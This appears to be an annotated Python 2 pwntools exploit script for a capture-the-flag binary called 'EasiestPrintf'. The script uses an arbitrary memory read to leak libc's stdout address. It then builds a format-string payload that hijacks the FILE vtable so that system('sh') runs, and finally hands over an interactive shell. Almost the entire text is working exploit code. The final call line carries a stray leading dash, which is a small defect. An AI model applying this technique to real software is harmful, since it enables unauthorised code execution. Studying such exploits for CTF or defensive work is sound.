# Python 2 pwntools script (print statement and raw_input are used); the
# target is a 32-bit Linux ELF and a copy of its libc is loaded so symbol
# offsets can be read from it. Module globals set here (r, libc, STDOUT)
# are used by hackIt below.
from pwn import *
context(arch = 'i386', os = 'linux')
libc = ELF('libc.so.6')  # must be the libc build the target actually runs with; offsets come from its symbol table
BINARY = "EasiestPrintf"
r = process(BINARY)  # spawn the target locally and talk to it over pipes
print "attach %d" % r.pid  # pid printed so a debugger can be attached by hand
# Hard-coded address the script asks the target to read from; being a fixed
# constant it presumes a fixed (non-PIE) load address for this binary -- confirm.
STDOUT = 0x0804A044
def hackIt():
    """Drive the target's two-prompt dialogue over the pipe `r`.

    First prompt: send STDOUT, parse the address the target prints back,
    and derive the libc base from it using the symbol offset in `libc`.
    Second prompt: answer with a format-string payload built by pwntools'
    fmtstr_payload, then hand the session to the user.

    Uses module globals r, libc and STDOUT; returns nothing. The numeric
    offsets (0x94, 0x150, 0x1c, argument position 7) are not derived here --
    they are specific to this binary and libc build and should be confirmed
    against the actual layouts. From a defensive view the script depends on
    two target behaviours: printing memory at a caller-chosen address, and
    passing user input to a printf-family format argument; removing either
    breaks the chain.
    """
    r.recvuntil("Which address you wanna read:\n")
    r.sendline(str(STDOUT))
    # Reply is parsed as 10 hex characters ("0x" + 8 digits); anything else raises ValueError.
    _IO_2_1_stdout_ = int(r.recv(10),16)
    # Fixed distance from the leaked stdout address; layout-specific -- TODO confirm
    _IO_file_jumps = _IO_2_1_stdout_ + 0x94
    # libc base = leaked symbol address minus that symbol's offset inside libc.so.6
    libc_base = _IO_2_1_stdout_ - libc.symbols['_IO_2_1_stdout_']
    system = libc_base + libc.symbols['system']
    log.info('_IO_2_1_stdout_: %#x' % _IO_2_1_stdout_)
    log.info('_IO_file_jumps: %#x' % _IO_file_jumps)
    log.info('libc_base: %#x' % libc_base)
    log.info('system: %#x' % system)
    r.recvuntil("Good Bye\n")
    # fmtstr_payload's first argument: printf argument index at which the
    # sent buffer appears on the stack (binary-specific).
    offset_buf = 7
    new_IO_file_jumps = _IO_2_1_stdout_+0x150
    # Three writes: two 4-byte addresses and the 4 bytes of "sh\0\0", emitted as 2-byte writes.
    payload = fmtstr_payload(offset_buf, {_IO_file_jumps : new_IO_file_jumps, new_IO_file_jumps+0x1c : system, _IO_2_1_stdout_:u32("sh\x00\x00")}, write_size="short")
    raw_input("debug?")  # pause so a debugger can be attached before the payload is sent
    r.sendline(payload)
    r.interactive()  # hand the pipe over to the user
- hackIt()